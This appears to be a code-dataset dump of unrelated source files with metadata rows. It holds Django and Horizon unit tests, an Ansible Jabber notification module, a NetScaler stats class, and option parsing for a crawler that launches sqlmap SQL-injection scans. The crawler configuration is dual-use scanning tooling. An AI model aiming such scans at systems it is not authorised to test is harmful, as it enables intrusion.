abim_son_son_son = Location.objects.create(
name='WICERE', parent=abim_son_son, type=subcounty)
expected_location_ancestors = [
abim_son_son_son, abim_son_son, abim_son, abim, uganda, africa]
ancestors = get_ancestors(abim_son_son_son, include_self=True)
self.assertEqual(expected_location_ancestors, ancestors)
def test_remove_key_value_when_value_is_ALL(self):
params = {'group__id': 'All', 'batch__id': 1,
'module__id': '', 'question__text': 'haha', 'survey': None}
self.assertEqual(
{'batch__id': 1, 'question__text': 'haha'}, clean_query_params(params))
def test_remove_key_value_when_value_is_NONE(self):
params = {'module__id': None, 'group__id': None, 'answer_type': None}
self.assertEqual({}, clean_query_params(params))
def test_append_text_to_all_keys(self):
params = {'batch__id': 1, 'question__text': 'haha', }
self.assertEqual({'group__batch__id': 1, 'group__question__text': 'haha'},
                         prepend_to_keys(params, 'group__'))
 | bsd-3-clause | 6,841,801,498,728,483,000 | 55.246479 | 119 | 0.638492 | false |
nwiizo/workspace_2017 | ansible-modules-extras/notification/jabber.py | 32 | 4791 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, Brian Coca <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
version_added: "1.2"
module: jabber
short_description: Send a message to jabber user or chat room
description:
- Send a message to jabber
options:
user:
description:
- User as which to connect
required: true
password:
description:
- password for user to connect
required: true
to:
description:
- user ID or name of the room, when using room use a slash to indicate your nick.
required: true
msg:
description:
- The message body.
required: true
default: null
host:
description:
- host to connect, overrides user info
required: false
port:
description:
- port to connect to, overrides default
required: false
default: 5222
encoding:
description:
- message encoding
required: false
# informational: requirements for nodes
requirements:
- python xmpp (xmpppy)
author: "Brian Coca (@bcoca)"
'''
EXAMPLES = '''
# send a message to a user
- jabber:
user: [email protected]
password: secret
to: [email protected]
msg: Ansible task finished
# send a message to a room
- jabber:
user: [email protected]
password: secret
to: [email protected]/ansiblebot
msg: Ansible task finished
# send a message, specifying the host and port
- jabber:
user: [email protected]
host: talk.example.net
port: 5223
password: secret
to: [email protected]
msg: Ansible task finished
'''
import os
import re
import time
HAS_XMPP = True
try:
import xmpp
except ImportError:
HAS_XMPP = False
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True),
password=dict(required=True, no_log=True),
to=dict(required=True),
msg=dict(required=True),
host=dict(required=False),
port=dict(required=False,default=5222),
encoding=dict(required=False),
),
supports_check_mode=True
)
if not HAS_XMPP:
module.fail_json(msg="The required python xmpp library (xmpppy) is not installed")
jid = xmpp.JID(module.params['user'])
user = jid.getNode()
server = jid.getDomain()
port = module.params['port']
password = module.params['password']
try:
to, nick = module.params['to'].split('/', 1)
except ValueError:
to, nick = module.params['to'], None
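    # 'to' may be a bare user JID or 'room@conference.host/nick'; splitting off
    # a nick above is what switches the module into groupchat mode later on.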
if module.params['host']:
host = module.params['host']
else:
host = server
if module.params['encoding']:
        xmpp.simplexml.ENCODING = module.params['encoding']
msg = xmpp.protocol.Message(body=module.params['msg'])
try:
conn=xmpp.Client(server, debug=[])
if not conn.connect(server=(host,port)):
module.fail_json(rc=1, msg='Failed to connect to server: %s' % (server))
if not conn.auth(user,password,'Ansible'):
module.fail_json(rc=1, msg='Failed to authorize %s on: %s' % (user,server))
# some old servers require this, also the sleep following send
conn.sendInitPresence(requestRoster=0)
if nick: # sending to room instead of user, need to join
msg.setType('groupchat')
msg.setTag('x', namespace='http://jabber.org/protocol/muc#user')
conn.send(xmpp.Presence(to=module.params['to']))
time.sleep(1)
else:
msg.setType('chat')
msg.setTo(to)
if not module.check_mode:
conn.send(msg)
time.sleep(1)
conn.disconnect()
except Exception:
e = get_exception()
module.fail_json(msg="unable to send msg: %s" % e)
module.exit_json(changed=False, to=to, user=user, msg=msg.getBody())
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
if __name__ == '__main__':
main()
| mit | -4,918,418,581,439,076,000 | 26.221591 | 90 | 0.637863 | false |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmppolicy_stats.py | 1 | 4510 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmppolicy_stats(base_resource) :
""" Statistics for compression policy resource.
"""
def __init__(self) :
self._name = ""
self._clearstats = ""
self._pipolicyhits = 0
self._pipolicyhitsrate = 0
self._pipolicyundefhits = 0
self._pipolicyundefhitsrate = 0
@property
def name(self) :
"""Name of the advanced compression policy for which to display statistics. If no name is specified, statistics for all advanced compression polices are shown.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the advanced compression policy for which to display statistics. If no name is specified, statistics for all advanced compression polices are shown.
"""
try :
self._name = name
except Exception as e:
raise e
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def pipolicyundefhitsrate(self) :
"""Rate (/s) counter for pipolicyundefhits.
"""
try :
return self._pipolicyundefhitsrate
except Exception as e:
raise e
@property
def pipolicyundefhits(self) :
"""Number of undef hits on the policy.
"""
try :
return self._pipolicyundefhits
except Exception as e:
raise e
@property
def pipolicyhitsrate(self) :
"""Rate (/s) counter for pipolicyhits.
"""
try :
return self._pipolicyhitsrate
except Exception as e:
raise e
@property
def pipolicyhits(self) :
"""Number of hits on the policy.
"""
try :
return self._pipolicyhits
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmppolicy_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmppolicy
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmppolicy_stats resources that are configured on netscaler.
"""
try :
obj = cmppolicy_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.name = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmppolicy_response(base_response) :
def __init__(self, length=1) :
self.cmppolicy = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmppolicy = [cmppolicy_stats() for _ in range(length)]
| apache-2.0 | 6,867,825,718,209,409,000 | 26.668712 | 186 | 0.700443 | false |
CvvT/crawler_sqlmap | crawler/setting.py | 1 | 2588 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'CwT'
import logging
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-d", "--depth", dest="depth", action="store", default=-1, type="int",
help="the distance from a starting location")
parser.add_option("--nocheckhost", dest="nocheckhost", action="store_true", default=False,
help="don't check host for crawler")
parser.add_option("--level", dest="level", action="store", default=1, type="int",
help="sqlmap scan level(from 1-5, default 1)")
parser.add_option("--timeout", dest="timeout", action="store", default=30, type="int",
help="sqlmap timeout for each task")
parser.add_option("-u", "--url", dest="url", action="store", default=None,
help="target url")
parser.add_option("--test", dest="test", action="store_true", default=False,
help="developer used only")
parser.add_option("--threads", dest="threads", action="store", default=1, type="int",
help="Max number of concurrent HTTP(s) requests (default 1)")
parser.add_option("-o", "--output", dest="output", action="store", default=".",
help="directory for report file")
parser.add_option("-e", "--experiment", dest="expr", action="store_true", default=False,
help="enable experiment features")
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
Default = {
"depth": -1,
"nocheckhost": False,
"level": 1,
"url": None,
"threads": 1,
"timeout": 30,
"output": ".",
"test": False,
"experiment": False
}
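# Default mirrors the optparse defaults above so that Setting(handle=False)
# can be constructed without parsing the command line.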
class Setting(object):
def __init__(self, handle=False):
self.__dict__.update(Default)
if handle:
options, argv = parser.parse_args()
setattr(self, "url", options.url)
setattr(self, "threads", options.threads)
setattr(self, "timeout", options.timeout)
setattr(self, "output", options.output)
setattr(self, "depth", options.depth)
setattr(self, "level", options.level)
if options.nocheckhost: setattr(self, "nocheckhost", True)
if options.expr: setattr(self, "experiment", True)
if options.test: setattr(self, "test", True)
def __setattr__(self, key, value):
self.__dict__[key] = value
def __getattr__(self, item):
return self.__dict__[item]
def display(self):
for k, v in self.__dict__.items():
logger.debug("%s: %s" % (k, v))
| apache-2.0 | -6,516,038,691,293,704,000 | 35.971429 | 90 | 0.584621 | false |
flochaz/horizon | openstack_dashboard/dashboards/admin/networks/tests.py | 6 | 65522 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django import http
from horizon.workflows import views
from mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.networks import tests
from openstack_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:admin:networks:index')
class NetworkTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('network_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_index(self):
tenants = self.tenants.list()
api.neutron.network_list(IsA(http.HttpRequest)) \
.AndReturn(self.networks.list())
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
for network in self.networks.list():
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/networks/index.html')
networks = res.context['networks_table'].data
self.assertItemsEqual(networks, self.networks.list())
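        # Pattern used by every test in this class: create_stubs swaps the
        # listed API calls for mox stubs, expectations are recorded above, and
        # ReplayAll() arms them before the view under test is exercised.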
@test.create_stubs({api.neutron: ('network_list',
'is_extension_supported',)})
def test_index_network_list_exception(self):
api.neutron.network_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/networks/index.html')
self.assertEqual(len(res.context['networks_table'].data), 0)
self.assertMessageCount(res, error=1)
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported')})
def test_network_detail(self):
self._test_network_detail()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_with_mac_learning(self):
self._test_network_detail(mac_learning=True)
def _test_network_detail(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertItemsEqual(subnets, [self.subnets.first()])
self.assertItemsEqual(ports, [self.ports.first()])
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_network_exception(self):
self._test_network_detail_network_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_network_exception_with_mac_learning(self):
self._test_network_detail_network_exception(mac_learning=True)
def _test_network_detail_network_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:detail', args=[network_id])
res = self.client.get(url)
redir_url = INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported')})
def test_network_detail_subnet_exception(self):
self._test_network_detail_subnet_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_subnet_exception_with_mac_learning(self):
self._test_network_detail_subnet_exception(mac_learning=True)
def _test_network_detail_subnet_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id).\
AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id).\
AndRaise(self.exceptions.neutron)
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id).\
AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertEqual(len(subnets), 0)
self.assertItemsEqual(ports, [self.ports.first()])
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_port_exception(self):
self._test_network_detail_port_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_port_exception_with_mac_learning(self):
self._test_network_detail_port_exception(mac_learning=True)
def _test_network_detail_port_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id).\
AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id).\
AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id).\
AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertItemsEqual(subnets, [self.subnets.first()])
self.assertEqual(len(ports), 0)
@test.create_stubs({api.neutron: ('profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_get(self,
test_with_profile=False):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(
http.HttpRequest)).AndReturn([tenants, False])
if test_with_profile:
net_profiles = self.net_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_get_with_profile(self):
self.test_network_create_get(test_with_profile=True)
@test.create_stubs({api.neutron: ('network_create',
'profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_post(self,
test_with_profile=False):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
params = {'name': network.name,
'tenant_id': tenant_id,
'admin_state_up': network.admin_state_up,
'router:external': True,
'shared': True,
'provider:network_type': 'local'}
if test_with_profile:
net_profiles = self.net_profiles.list()
net_profile_id = self.net_profiles.first().id
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
params['net_profile_id'] = net_profile_id
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
api.neutron.network_create(IsA(http.HttpRequest), **params)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': True,
'network_type': 'local'}
if test_with_profile:
form_data['net_profile_id'] = net_profile_id
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_post_with_profile(self):
self.test_network_create_post(test_with_profile=True)
@test.create_stubs({api.neutron: ('network_create',
'profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_post_network_exception(self,
test_with_profile=False):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
params = {'name': network.name,
'tenant_id': tenant_id,
'admin_state_up': network.admin_state_up,
'router:external': True,
'shared': False,
'provider:network_type': 'local'}
if test_with_profile:
net_profiles = self.net_profiles.list()
net_profile_id = self.net_profiles.first().id
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
params['net_profile_id'] = net_profile_id
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
api.neutron.network_create(IsA(http.HttpRequest),
**params).AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'local'}
if test_with_profile:
form_data['net_profile_id'] = net_profile_id
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_post_network_exception_with_profile(self):
self.test_network_create_post_network_exception(
test_with_profile=True)
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_vlan_segmentation_id_invalid(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'vlan',
'physical_network': 'default',
'segmentation_id': 4095}
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "1 through 4094")
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_gre_segmentation_id_invalid(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'gre',
'physical_network': 'default',
'segmentation_id': (2 ** 32) + 1}
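        # GRE keys are validated against 0 through 2**32 - 1, so this value is
        # out of range and the form is expected to reject it.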
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "0 through %s" % ((2 ** 32) - 1))
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'segmentation_id_range': {'vxlan': [10, 20]}})
def test_network_create_vxlan_segmentation_id_custom(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'vxlan',
'physical_network': 'default',
'segmentation_id': 9}
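        # 9 falls outside the custom vxlan range [10, 20] configured via
        # update_settings above, so the form is expected to reject it.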
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "10 through 20")
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'supported_provider_types': []})
def test_network_create_no_provider_types(self):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
self.assertContains(res, '<input type="hidden" name="network_type" '
'id="id_network_type" />', html=True)
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'supported_provider_types': ['local', 'flat', 'gre']})
def test_network_create_unsupported_provider_types(self):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
network_type = res.context['form'].fields['network_type']
self.assertListEqual(list(network_type.choices), [('local', 'Local'),
('flat', 'Flat'),
('gre', 'GRE')])
@test.create_stubs({api.neutron: ('network_get',)})
def test_network_update_get(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/update.html')
@test.create_stubs({api.neutron: ('network_get',)})
def test_network_update_get_exception(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.get(url)
redir_url = INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_update',
'network_get',)})
def test_network_update_post(self):
network = self.networks.first()
params = {'name': network.name,
'shared': True,
'admin_state_up': network.admin_state_up,
'router:external': True}
api.neutron.network_update(IsA(http.HttpRequest), network.id,
**params)\
.AndReturn(network)
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'name': network.name,
'tenant_id': network.tenant_id,
'admin_state': network.admin_state_up,
'shared': True,
'external': True}
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_update',
'network_get',)})
def test_network_update_post_exception(self):
network = self.networks.first()
params = {'name': network.name,
'shared': False,
'admin_state_up': network.admin_state_up,
'router:external': False}
api.neutron.network_update(IsA(http.HttpRequest), network.id,
**params)\
.AndRaise(self.exceptions.neutron)
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'name': network.name,
'tenant_id': network.tenant_id,
'admin_state': network.admin_state_up,
'shared': False,
'external': False}
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_list',
'network_delete',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_delete_network(self):
tenants = self.tenants.list()
network = self.networks.first()
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
api.neutron.network_list(IsA(http.HttpRequest))\
.AndReturn([network])
api.neutron.network_delete(IsA(http.HttpRequest), network.id)
self.mox.ReplayAll()
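        # Horizon table actions post as '<table>__<action>__<row id>', so this
        # targets the delete action for the given network row.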
form_data = {'action': 'networks__delete__%s' % network.id}
res = self.client.post(INDEX_URL, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_list',
'network_delete',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_delete_network_exception(self):
tenants = self.tenants.list()
network = self.networks.first()
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
api.neutron.network_list(IsA(http.HttpRequest))\
.AndReturn([network])
api.neutron.network_delete(IsA(http.HttpRequest), network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'action': 'networks__delete__%s' % network.id}
res = self.client.post(INDEX_URL, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
class NetworkSubnetTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('subnet_get',)})
def test_subnet_detail(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(self.subnets.first())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:subnets:detail',
args=[subnet.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'project/networks/subnets/detail.html')
self.assertEqual(res.context['subnet'].id, subnet.id)
@test.create_stubs({api.neutron: ('subnet_get',)})
def test_subnet_detail_exception(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:subnets:detail',
args=[subnet.id])
res = self.client.get(url)
